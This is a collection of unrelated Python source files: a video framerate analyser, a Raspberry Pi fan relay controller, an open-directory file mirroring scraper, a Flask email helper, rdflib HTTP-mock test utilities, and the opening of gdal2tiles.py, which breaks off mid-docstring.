source | python
|---|---|
video_analyser.py
|
import argparse as argp
import multiprocessing.dummy as mp
from pathlib import Path
import time
import cv2
import pandas as pd
from tqdm import tqdm
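# Video writing runs in workers from multiprocessing.dummy (i.e. threads): the main
# loop pushes frames onto a queue, writer_write drains the queue and writes each frame
# to disk, and the string "STOP" is used as a sentinel to shut the worker down.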
def writer_write(writer, q):
while True:
frame = q.get()
if isinstance(frame, str) and frame == "STOP":
return
writer.write(frame)
def writer_create(name: str, fps, size, q):
video_writer = cv2.VideoWriter(name, cv2.VideoWriter_fourcc(*"MJPG"), fps, size)
writer_write(video_writer, q)
video_writer.release()
return
def main(args):
cap = cv2.VideoCapture(args.INPUT)
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
reported_fps = int(cap.get(cv2.CAP_PROP_FPS))
reported_bitrate = int(cap.get(cv2.CAP_PROP_BITRATE))
print("Total frames: {0}".format(total_frames))
print("Reported FPS: {0}".format(reported_fps))
print("Reported Bitrate: {0}kbps".format(reported_bitrate))
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
size = (width, height)
original_path = None
if args.OUTPUT:
original_path = Path(args.OUTPUT)
else:
original_path = Path(args.INPUT)
original_name = original_path.stem
original_parent = original_path.parent
# Video with duplicated frames removed
result_queue = None
result_proc = None
if args.SAVE in (1, 3):
result_name = Path(original_parent).joinpath(original_name + "_result.avi")
result_name.unlink(missing_ok=True)
result_queue = mp.Queue()
result_proc = mp.Process(target=writer_create, args=(str(result_name), reported_fps, size, result_queue,))
result_proc.start()
# Video with difference blend mode between original and result video
diff_queue = None
diff_proc = None
if args.SAVE in (2, 3):
diff_name = Path(original_parent).joinpath(original_name + "_diff.avi")
diff_name.unlink(missing_ok=True)
diff_queue = mp.Queue()
diff_proc = mp.Process(target=writer_create, args=(str(diff_name), reported_fps, size, diff_queue,))
diff_proc.start()
frames = []
frame_number = -1
prev_frame = None
# with tqdm(total=total_frames, unit="frames") as prog_bar:
time_start = time.time()
prog_bar = tqdm(total=total_frames, unit="frames", leave=True)
while cap.isOpened():
frame_number += 1
prog_bar.set_description("Processing frame number {}".format(frame_number))
prog_bar.update(1)
ret, frame = cap.read()
if frame_number == 0:
prev_frame = frame.copy()
continue
try:
# frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# prev_frame_gray = cv2.cvtColor(prev_frame, cv2.COLOR_BGR2GRAY)
# frame_diff = cv2.absdiff(frame_gray, prev_frame_gray)
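# A frame counts as unique when the mean absolute per-pixel difference from the
# previous frame exceeds the threshold; otherwise it is treated as a duplicate.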
frame_diff = cv2.absdiff(frame, prev_frame)
if diff_queue is not None:
# diff_writer.write(frame_diff)
diff_queue.put(frame_diff)
mean = frame_diff.mean()
if mean > args.THRESHOLD:
frames.append(True)
if result_queue is not None:
# result_writer.write(frame)
result_queue.put(frame)
else:
frames.append(False)
prev_frame = frame.copy()
except KeyboardInterrupt:
exit(1)
except Exception as e:
# print("\r\n{0}".format(e))
if frame_number > total_frames:
break
else:
continue
if frame_number > total_frames:
break
time_stop = time.time()
n = prog_bar.n
prog_bar.close()
msg = "Calculations "
cap.release()
if result_queue is not None:
print("Finishing writing to result video file.")
result_queue.put("STOP")
result_proc.join()
msg += "and writing to the result file "
if diff_queue is not None:
print("Finishing writing to difference video file.")
diff_queue.put("STOP")
diff_proc.join()
msg += "and writing to the difference file "
cv2.destroyAllWindows()
time_total = time_stop - time_start
app_fps = n / time_total
msg += "took {0} seconds to complete.\n"
msg += "Average frames calculated per second is {1}."
print(msg.format(time_total, app_fps))
# indices of the unique frames (the original collected the boolean values themselves,
# which made every computed frametime identical)
res = [i for i, unique in enumerate(frames) if unique]
times = dict()
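# base is the frame interval in milliseconds implied by the container's reported FPS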
base = float((1 / reported_fps) * 1000)
for i in range(len(res)):
if i == 0:
times[i] = base
else:
times[i] = base * (res[i] - res[i - 1])
data = dict()
data["frame number"] = []
data["frametime"] = []
data["framerate"] = []
for k, v in times.items():
data["frame number"].append(k)
data["frametime"].append(v)
if v == 0:
data["framerate"].append("INF")
else:
data["framerate"].append(1 / (v / 1000))
df = pd.DataFrame.from_dict(data)
frametime_stats = pd.DataFrame(df, columns=["frametime"])
framerate_stats = pd.DataFrame(df, columns=["framerate"])
stats_basic = dict()
stats_frametime_dict = dict()
stats_framerate_dict = dict()
stats_basic["Number of Unique Frames"] = [int(sum(frames))]
stats_basic["Number of Duplicated Frames"] = [int(len(frames) - sum(frames))]
if len(frames) == 0:
stats_basic["Percentage of Unique Frames"] = ["0 %"]
stats_basic["Percentage of Duplicated Frames"] = ["0 %"]
else:
stats_basic["Percentage of Unique Frames"] = ["{} %".format(sum(frames) / len(frames) * 100)]
stats_basic["Percentage of Duplicated Frames"] = ["{} %".format(stats_basic["Number of Duplicated Frames"][0] / len(frames) * 100)]
stats_frametime_dict["Lowest"] = dict(frametime_stats.min(axis=0))
stats_frametime_dict["Highest"] = dict(frametime_stats.max(axis=0))
stats_frametime_dict["Mean"] = dict(frametime_stats.mean(axis=0))
stats_frametime_dict["Median"] = dict(frametime_stats.median(axis=0))
stats_frametime_dict["0.1 Percent Lows"] = dict(frametime_stats.quantile(q=0.001, axis=0))
stats_frametime_dict["1 Percent Lows"] = dict(frametime_stats.quantile(q=0.01, axis=0))
stats_frametime_dict["99 Percent Lows"] = dict(frametime_stats.quantile(q=0.99, axis=0))
stats_frametime_dict["99.9 Percent Lows"] = dict(frametime_stats.quantile(q=0.999, axis=0))
stats_framerate_dict["Lowest"] = dict(framerate_stats.min(axis=0))
stats_framerate_dict["Highest"] = dict(framerate_stats.max(axis=0))
stats_framerate_dict["Mean"] = dict(framerate_stats.mean(axis=0))
stats_framerate_dict["Median"] = dict(framerate_stats.median(axis=0))
stats_framerate_dict["0.1 Percent Lows"] = dict(framerate_stats.quantile(q=0.001, axis=0))
stats_framerate_dict["1 Percent Lows"] = dict(framerate_stats.quantile(q=0.01, axis=0))
stats_framerate_dict["99 Percent Lows"] = dict(framerate_stats.quantile(q=0.99, axis=0))
stats_framerate_dict["99.9 Percent Lows"] = dict(framerate_stats.quantile(q=0.999, axis=0))
stats_basic_df = pd.DataFrame.from_dict(stats_basic)
stats_frametime_df = pd.DataFrame.from_dict(stats_frametime_dict)
stats_framerate_df = pd.DataFrame.from_dict(stats_framerate_dict)
stats_joined = pd.concat([stats_frametime_df, stats_framerate_df], axis=0)
print("\nStatistics")
print(stats_basic_df.transpose().to_string(header=False))
print("\n", stats_joined.transpose().to_string())
csv_name = Path(original_parent).joinpath(original_name + "_report.csv")
csv_name.unlink(missing_ok=True)
df.to_csv(csv_name, index=False)
# stats_joined.to_csv(csv_name)
# with open(csv_name, "w", newline="\n") as csv_file:
# df.to_csv(csv_file, index=False)
def parse_arguments():
main_help = "Analyze framerate, frame drops, and frame tears of a video file.\n"
parser = argp.ArgumentParser(description=main_help, formatter_class=argp.RawTextHelpFormatter)
parser.add_argument("INPUT", type=str, help="Video File")
output_help = "Output filename (Default will be named after input file)."
parser.add_argument("-o", "--output", dest="OUTPUT", type=str, help=output_help)
threshold_help = "Pixel difference threshold to count as duplicate frames, must be an integer between 0 and 255.\n"
threshold_help += "A value of 0 will count all all frames as unique, while 255 will only count\n"
threshold_help += "frames that are 100 percent different (Default: 5)."
parser.add_argument("-t", "--threshold", dest="THRESHOLD", type=int, default=5, help=threshold_help)
save_help = "Save the video frames of the video with duplicated frames removed and/or the video showing the difference between the original and deduplicated frame video.\n"
save_help += "A value of 0 will not save any video files.\n"
save_help += "A value of 1 will only save the version with duplicated frames removed.\n"
save_help += "A value of 2 will only save the version that shows the difference between the original and the deduplicated video.\n"
save_help += "A value of 3 will save both of the videos from options 1 and 2.\n"
save_help += "Note that saving the video file(s) can drastically increase the program's runtime. (Default: 0)"
parser.add_argument("-s", "--save", dest="SAVE", action="store", type=int, default=0, choices=[0, 1, 2, 3], help=save_help)
args = parser.parse_args()
if args.THRESHOLD < 0 or args.THRESHOLD > 255:
parser.error("Value {0} for \"threshold\" argument was not within the range of 0 to 255".format(args.THRESHOLD))
return args
if __name__ == "__main__":
args = parse_arguments()
main(args)
|
vanee_controller.py
|
import time
import threading
import logging
import queue
import signal
import sys
from datetime import datetime, timedelta
import RPi.GPIO as GPIO
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s:%(name)s:%(message)s")
MAX_HIGH_TIME = timedelta(minutes=60)
HIGH_TIME_STEP = timedelta(minutes=15)
RELAY_PIN = 37
INPUT_PIN = 7
# remap relay states so that the "reset" state when GPIO.cleanup() is called is low speed
RELAY_LOW_STATE = GPIO.HIGH
RELAY_HIGH_STATE = GPIO.LOW
def button_watcher(q, quit_event):
logger = logging.getLogger("button")
while True:
if quit_event.is_set():
return
input_state = GPIO.input(INPUT_PIN)
if input_state:
logger.info('button press detected')
q.put(True)
time.sleep(0.2)
def relay_switcher(q, quit_event):
next_low_time = datetime.utcnow()
logger = logging.getLogger("relay")
while True:
if quit_event.is_set():
return
if not q.empty():
item = q.get()
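# Each button press extends the high-speed window by HIGH_TIME_STEP, measured from
# now or from the currently scheduled low time (whichever is later), but never
# further than MAX_HIGH_TIME from now.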
next_low_time = min(
datetime.utcnow() + MAX_HIGH_TIME,
max(datetime.utcnow(), next_low_time) + HIGH_TIME_STEP
)
logger.info("set next low time to %s", next_low_time)
if next_low_time > datetime.utcnow():
logger.info("%d seconds until next low time, set relay to high", (next_low_time - datetime.utcnow()).total_seconds())
GPIO.output(RELAY_PIN, RELAY_HIGH_STATE)
else:
logger.info("next low time is in the past, set relay to low")
GPIO.output(RELAY_PIN, RELAY_LOW_STATE)
time.sleep(1)
def cleanup(t1, t2):
logger = logging.getLogger("cleanup")
logger.info("attempting to close threads")
quit_event.set()
t1.join()
t2.join()
logger.info("threads successfully closed")
logger.info("shutting down... setting relay to low")
GPIO.output(RELAY_PIN, RELAY_LOW_STATE)
time.sleep(1)
logger.info("calling GPIO.cleanup")
GPIO.cleanup()
sys.exit()
if __name__ == '__main__':
logger = logging.getLogger("main")
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(INPUT_PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(RELAY_PIN, GPIO.OUT)
logger.info("startup... setting relay to low")
GPIO.output(RELAY_PIN, RELAY_LOW_STATE)
q = queue.Queue(10)
quit_event = threading.Event()
quit_event.clear()
t1 = threading.Thread(name='button_watcher', target=button_watcher, args=(q, quit_event))
t2 = threading.Thread(name='relay_switcher', target=relay_switcher, args=(q, quit_event))
logger.info("starting threads")
t1.start()
t2.start()
signal.signal(signal.SIGTERM, lambda *args: cleanup(t1, t2))
try:
while True:
time.sleep(60)
except KeyboardInterrupt:
cleanup(t1, t2)
|
indexer.py
|
from bs4 import BeautifulSoup as bs
import os
import threading
import requests
from time import sleep, ctime
host = "http://index-of.co.uk/"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"} # spoofed user agent
fully_retrieved_dir = []
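# directories fully downloaded in this run; save() flushes them to retrieved_dir.dmd
# so an interrupted run can resume without re-fetching them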
def main():
try:
if not os.path.isfile(os.getcwd()+"/retrieved_dir.dmd"): # checking if retrieved_dir.dmd file exists
with open(os.getcwd()+"/retrieved_dir.dmd", "w") as f: # else create it
pass
with open(os.getcwd()+"/retrieved_dir.dmd", "r") as f: #opening for reading
dirs = f.readlines()
if dirs != []: # if the retrieved_dir.dmd file has been written to before
for dir in dirs:
dir = dir.strip("\n")
if dir in site_dir_list:
site_dir_list.remove(dir)
create_threads() # call create threads function
except Exception:
save()
#exit() # exit cleanly
def create_threads():
try:
threads_list = []
for i in range(5): # create up to five worker threads at a time
if site_dir_list != []: # checking in case the remaining directories are less than five
new_thread = threading.Thread(target=start_job, args=()) # each worker pulls directories from site_dir_list itself
threads_list.append(new_thread) # sending the thread to the list
for i in range(len(threads_list)):
threads_list[i].start() # initiate threading
sleep(1)
for i in range(len(threads_list)):
threads_list[i].join()
except Exception:
save()
def start_job():
while site_dir_list != []:
dir = site_dir_list[-1]
site_dir_list.remove(dir)
get_links(dir)
save()
def get_links(dir):
try:
with requests.Session() as s:
page = s.get(host+"/"+dir, headers=headers) #open the page of the current directory
if not os.path.isdir(os.getcwd()+"/"+dir): #check if the directory has not been created
os.mkdir(os.getcwd()+"/"+dir) # create the directory
files_link = get_files_link(page.content) # call the function that retrieve and returns the links
files_link = remove_duplicate(files_link) # remove duplicate links
with requests.Session() as s:
for link in files_link:
file_name = validate_filename(link)
if not os.path.isfile(os.getcwd()+"/"+dir+file_name):
file_get = s.get(host+"/"+dir+link, headers=headers)
with open(os.getcwd()+"/"+dir+file_name, "wb") as f:
f.write(file_get.content)
print("Retrieved %s \n"%(file_name,))
fully_retrieved_dir.append(dir)
except Exception:
save()
def validate_filename(link):
try:
name = link.replace("%20", "_")
return name
except Exception:
save()
def get_files_link(page):
try:
links = []
soup = bs(str(page), "html.parser")
a_tags = soup.find_all("a")
for a in a_tags:
link = a["href"]
if link_is_file(link):
links.append(link)
return links
except Exception:
save()
def remove_duplicate(links):
unique_links = [] #this list does not contain duplicates
for link in links:
if link not in unique_links:
unique_links.append(link)
return unique_links
# simple heuristics to decide whether a link points to a directory on the index page
def is_link_dir(link):
try:
if link[:4] == "http":
return False
elif link[-1] != "/":
return False
elif not link[0].isupper():
return False
else:
return True
except Exception:
save()
def link_is_file(link):
try:
if link[:4] == "http":
return False
elif link[-1] == "/":
return False
elif not link[0].isupper():
return False
else:
return True
except Exception:
save()
# saves the names of directories that have been fully retrieved
def save():
with open(os.getcwd()+"/retrieved_dir.dmd", "a") as f:
if fully_retrieved_dir != []:
for i in range(len(fully_retrieved_dir)):
f.write(fully_retrieved_dir[i]+"\n")
fully_retrieved_dir.clear() # removing items while iterating would skip entries
# retrieves the directory links from the site's homepage
def get_site_dir_list():
try:
links = []
with requests.Session() as s:
open_homepage = s.get(host, headers=headers) #opening the homepage of the site
homepage = open_homepage.content # raw HTML of the homepage
soup = bs(str(homepage), "html.parser")
a_tags = soup.find_all("a")
all_links = []
for a in a_tags:
link = a["href"] #extracting the link text with bs
all_links.append(link)
for link in all_links:
if is_link_dir(link):
links.append(link)
return links
except Exception:
save()
# placed here because get_site_dir_list() must be defined before it is called
site_dir_list = get_site_dir_list() # get the directory links from the site
site_dir_list = remove_duplicate(site_dir_list) # remove duplicate links
main()
#if __name__=="__main__":
# main()
|
email.py
|
# coding: utf-8
from flask_mail import Message
from app import mail
from flask import render_template
from app import app
from threading import Thread
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
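# Sending happens in a background thread; mail.send() needs an application context,
# so the Flask app object is passed in and app.app_context() is entered explicitly.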
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
|
testutils.py
|
from __future__ import print_function
import os
import sys
from types import TracebackType
import isodate
import datetime
import random
from contextlib import AbstractContextManager, contextmanager
from typing import (
Callable,
Iterable,
List,
Optional,
TYPE_CHECKING,
Type,
Iterator,
Set,
Tuple,
Dict,
Any,
TypeVar,
cast,
NamedTuple,
)
from urllib.parse import ParseResult, unquote, urlparse, parse_qs
from traceback import print_exc
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer, SimpleHTTPRequestHandler
import email.message
import unittest
from rdflib import BNode, Graph, ConjunctiveGraph
from rdflib.term import Node
from unittest.mock import MagicMock, Mock
from urllib.error import HTTPError
from urllib.request import urlopen
from pathlib import PurePath, PureWindowsPath
from nturl2path import url2pathname as nt_url2pathname
if TYPE_CHECKING:
import typing_extensions as te
# TODO: make an introspective version (like this one) of
# rdflib.graphutils.isomorphic and use instead.
from test import TEST_DIR
def crapCompare(g1, g2):
"""A really crappy way to 'check' if two graphs are equal. It ignores blank
nodes completely and ignores subgraphs."""
if len(g1) != len(g2):
raise Exception("Graphs dont have same length")
for t in g1:
s = _no_blank(t[0])
o = _no_blank(t[2])
if not (s, t[1], o) in g2:
e = "(%s, %s, %s) is not in both graphs!" % (s, t[1], o)
raise Exception(e)
def _no_blank(node):
if isinstance(node, BNode):
return None
if isinstance(node, Graph):
return None # node._Graph__identifier = _SQUASHED_NODE
return node
def check_serialize_parse(fpath, infmt, testfmt, verbose=False):
g = ConjunctiveGraph()
_parse_or_report(verbose, g, fpath, format=infmt)
if verbose:
for t in g:
print(t)
print("========================================")
print("Parsed OK!")
s = g.serialize(format=testfmt)
if verbose:
print(s)
g2 = ConjunctiveGraph()
_parse_or_report(verbose, g2, data=s, format=testfmt)
if verbose:
print(g2.serialize())
crapCompare(g, g2)
def _parse_or_report(verbose, graph, *args, **kwargs):
try:
graph.parse(*args, **kwargs)
except:
if verbose:
print("========================================")
print("Error in parsing serialization:")
print(args, kwargs)
raise
def get_random_ip(parts: Optional[List[str]] = None) -> str:
if parts is None:
parts = ["127"]
for _ in range(4 - len(parts)):
parts.append(f"{random.randint(0, 255)}")
return ".".join(parts)
@contextmanager
def ctx_http_server(
handler: Type[BaseHTTPRequestHandler], host: str = "127.0.0.1"
) -> Iterator[HTTPServer]:
server = HTTPServer((host, 0), handler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
yield server
server.shutdown()
server.socket.close()
server_thread.join()
class GraphHelper:
@classmethod
def triple_set(cls, graph: Graph) -> Set[Tuple[Node, Node, Node]]:
return set(graph.triples((None, None, None)))
@classmethod
def triple_sets(cls, graphs: Iterable[Graph]) -> List[Set[Tuple[Node, Node, Node]]]:
result: List[Set[Tuple[Node, Node, Node]]] = []
for graph in graphs:
result.append(cls.triple_set(graph))
return result
@classmethod
def equals(cls, lhs: Graph, rhs: Graph) -> bool:
return cls.triple_set(lhs) == cls.triple_set(rhs)
GenericT = TypeVar("GenericT", bound=Any)
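# make_spypair wraps a method so that every call is also recorded on a MagicMock
# ("spy") while still delegating to the original method; it returns both the wrapper
# and the mock so tests can assert on call counts and arguments.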
def make_spypair(method: GenericT) -> Tuple[GenericT, Mock]:
m = MagicMock()
def wrapper(self: Any, *args: Any, **kwargs: Any) -> Any:
m(*args, **kwargs)
return method(self, *args, **kwargs)
setattr(wrapper, "mock", m)
return cast(GenericT, wrapper), m
HeadersT = Dict[str, List[str]]
PathQueryT = Dict[str, List[str]]
class MockHTTPRequests(NamedTuple):
method: str
path: str
parsed_path: ParseResult
path_query: PathQueryT
headers: email.message.Message
class MockHTTPResponse(NamedTuple):
status_code: int
reason_phrase: str
body: bytes
headers: HeadersT
class SimpleHTTPMock:
"""
SimpleHTTPMock allows testing of code that relies on an HTTP server.
NOTE: Currently only the GET and POST methods are supported.
Objects of this class hold a list of responses for each method (GET, POST, etc.)
and return these responses for these methods in sequence.
All requests received are appended to a method-specific list.
Example usage:
>>> httpmock = SimpleHTTPMock()
>>> with ctx_http_server(httpmock.Handler) as server:
... url = "http://{}:{}".format(*server.server_address)
... # add a response the server should give:
... httpmock.do_get_responses.append(
... MockHTTPResponse(404, "Not Found", b"gone away", {})
... )
...
... # send a request to get the first response
... http_error: Optional[HTTPError] = None
... try:
... urlopen(f"{url}/bad/path")
... except HTTPError as caught:
... http_error = caught
...
... assert http_error is not None
... assert http_error.code == 404
...
... # get and validate request that the mock received
... req = httpmock.do_get_requests.pop(0)
... assert req.path == "/bad/path"
"""
# TODO: add additional methods (PUT, PATCH, ...) similar to GET and POST
def __init__(self):
self.do_get_requests: List[MockHTTPRequests] = []
self.do_get_responses: List[MockHTTPResponse] = []
self.do_post_requests: List[MockHTTPRequests] = []
self.do_post_responses: List[MockHTTPResponse] = []
_http_mock = self
class Handler(SimpleHTTPRequestHandler):
http_mock = _http_mock
def _do_GET(self):
parsed_path = urlparse(self.path)
path_query = parse_qs(parsed_path.query)
request = MockHTTPRequests(
"GET", self.path, parsed_path, path_query, self.headers
)
self.http_mock.do_get_requests.append(request)
response = self.http_mock.do_get_responses.pop(0)
self.send_response(response.status_code, response.reason_phrase)
for header, values in response.headers.items():
for value in values:
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.body)
self.wfile.flush()
return
(do_GET, do_GET_mock) = make_spypair(_do_GET)
def _do_POST(self):
parsed_path = urlparse(self.path)
path_query = parse_qs(parsed_path.query)
request = MockHTTPRequests(
"POST", self.path, parsed_path, path_query, self.headers
)
self.http_mock.do_post_requests.append(request)
response = self.http_mock.do_post_responses.pop(0)
self.send_response(response.status_code, response.reason_phrase)
for header, values in response.headers.items():
for value in values:
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.body)
self.wfile.flush()
return
(do_POST, do_POST_mock) = make_spypair(_do_POST)
def log_message(self, format: str, *args: Any) -> None:
pass
self.Handler = Handler
self.do_get_mock = Handler.do_GET_mock
self.do_post_mock = Handler.do_POST_mock
def reset(self):
self.do_get_requests.clear()
self.do_get_responses.clear()
self.do_get_mock.reset_mock()
self.do_post_requests.clear()
self.do_post_responses.clear()
self.do_post_mock.reset_mock()
@property
def call_count(self):
return self.do_post_mock.call_count + self.do_get_mock.call_count
class SimpleHTTPMockTests(unittest.TestCase):
def test_example(self) -> None:
httpmock = SimpleHTTPMock()
with ctx_http_server(httpmock.Handler) as server:
url = "http://{}:{}".format(*server.server_address)
# add two responses the server should give:
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
# send a request to get the first response
with self.assertRaises(HTTPError) as raised:
urlopen(f"{url}/bad/path")
assert raised.exception.code == 404
# get and validate request that the mock received
req = httpmock.do_get_requests.pop(0)
self.assertEqual(req.path, "/bad/path")
# send a request to get the second response
resp = urlopen(f"{url}/")
self.assertEqual(resp.status, 200)
self.assertEqual(resp.read(), b"here it is")
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
class ServedSimpleHTTPMock(SimpleHTTPMock, AbstractContextManager):
"""
ServedSimpleHTTPMock is a SimpleHTTPMock with a built-in HTTP server.
Example usage:
>>> with ServedSimpleHTTPMock() as httpmock:
... # add a response the server should give:
... httpmock.do_get_responses.append(
... MockHTTPResponse(404, "Not Found", b"gone away", {})
... )
...
... # send a request to get the first response
... http_error: Optional[HTTPError] = None
... try:
... urlopen(f"{httpmock.url}/bad/path")
... except HTTPError as caught:
... http_error = caught
...
... assert http_error is not None
... assert http_error.code == 404
...
... # get and validate request that the mock received
... req = httpmock.do_get_requests.pop(0)
... assert req.path == "/bad/path"
"""
def __init__(self, host: str = "127.0.0.1"):
super().__init__()
self.server = HTTPServer((host, 0), self.Handler)
self.server_thread = Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self) -> None:
self.server.shutdown()
self.server.socket.close()
self.server_thread.join()
@property
def address_string(self) -> str:
(host, port) = self.server.server_address
return f"{host}:{port}"
@property
def url(self) -> str:
return f"http://{self.address_string}"
def __enter__(self) -> "ServedSimpleHTTPMock":
return self
def __exit__(
self,
__exc_type: Optional[Type[BaseException]],
__exc_value: Optional[BaseException],
__traceback: Optional[TracebackType],
) -> "te.Literal[False]":
self.stop()
return False
class ServedSimpleHTTPMockTests(unittest.TestCase):
def test_example(self) -> None:
with ServedSimpleHTTPMock() as httpmock:
# add two responses the server should give:
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
# send a request to get the first response
with self.assertRaises(HTTPError) as raised:
urlopen(f"{httpmock.url}/bad/path")
assert raised.exception.code == 404
# get and validate request that the mock received
req = httpmock.do_get_requests.pop(0)
self.assertEqual(req.path, "/bad/path")
# send a request to get the second response
resp = urlopen(f"{httpmock.url}/")
self.assertEqual(resp.status, 200)
self.assertEqual(resp.read(), b"here it is")
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
def eq_(lhs, rhs, msg=None):
"""
This function mimics the similar function from nose. Ideally nothing
should use it, but there is a lot of code that still does, and it's fairly
simple to just keep this small polyfill here for now.
"""
if msg:
assert lhs == rhs, msg
else:
assert lhs == rhs
PurePathT = TypeVar("PurePathT", bound=PurePath)
def file_uri_to_path(
file_uri: str,
path_class: Type[PurePathT] = PurePath, # type: ignore[assignment]
url2pathname: Optional[Callable[[str], str]] = None,
) -> PurePathT:
"""
This function returns a pathlib.PurePath object for the supplied file URI.
:param str file_uri: The file URI ...
:param class path_class: The type of path in the file_uri. By default it uses
the system specific path pathlib.PurePath, to force a specific type of path
pass pathlib.PureWindowsPath or pathlib.PurePosixPath
:returns: the pathlib.PurePath object
:rtype: pathlib.PurePath
"""
is_windows_path = isinstance(path_class(), PureWindowsPath)
file_uri_parsed = urlparse(file_uri)
if url2pathname is None:
if is_windows_path:
url2pathname = nt_url2pathname
else:
url2pathname = unquote
pathname = url2pathname(file_uri_parsed.path)
result = path_class(pathname)
return result
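# Usage sketch (illustrative, not part of the test suite):
#   file_uri_to_path("file:///C:/some%20dir/x.txt", PureWindowsPath)
#   -> PureWindowsPath('C:/some dir/x.txt')
#   file_uri_to_path("file:///tmp/a%20b")  # on POSIX -> PurePosixPath('/tmp/a b')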
|
gdal2tiles.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id$
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
from __future__ import print_function, division
import math
from multiprocessing import Pipe, Pool, Process, Manager
import os
import tempfile
import threading
import shutil
import sys
from uuid import uuid4
from xml.etree import ElementTree
from osgeo import gdal
from osgeo import osr
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
numpy_available = True
except ImportError:
# 'antialias' resampling is not available
numpy_available = False
__version__ = "$Id$"
resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias')
profile_list = ('mercator', 'geodetic', 'raster')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none')
threadLocal = threading.local()
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:3857)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
r"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:3857.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in meters XY pixels Z zoom XYZ from TMS
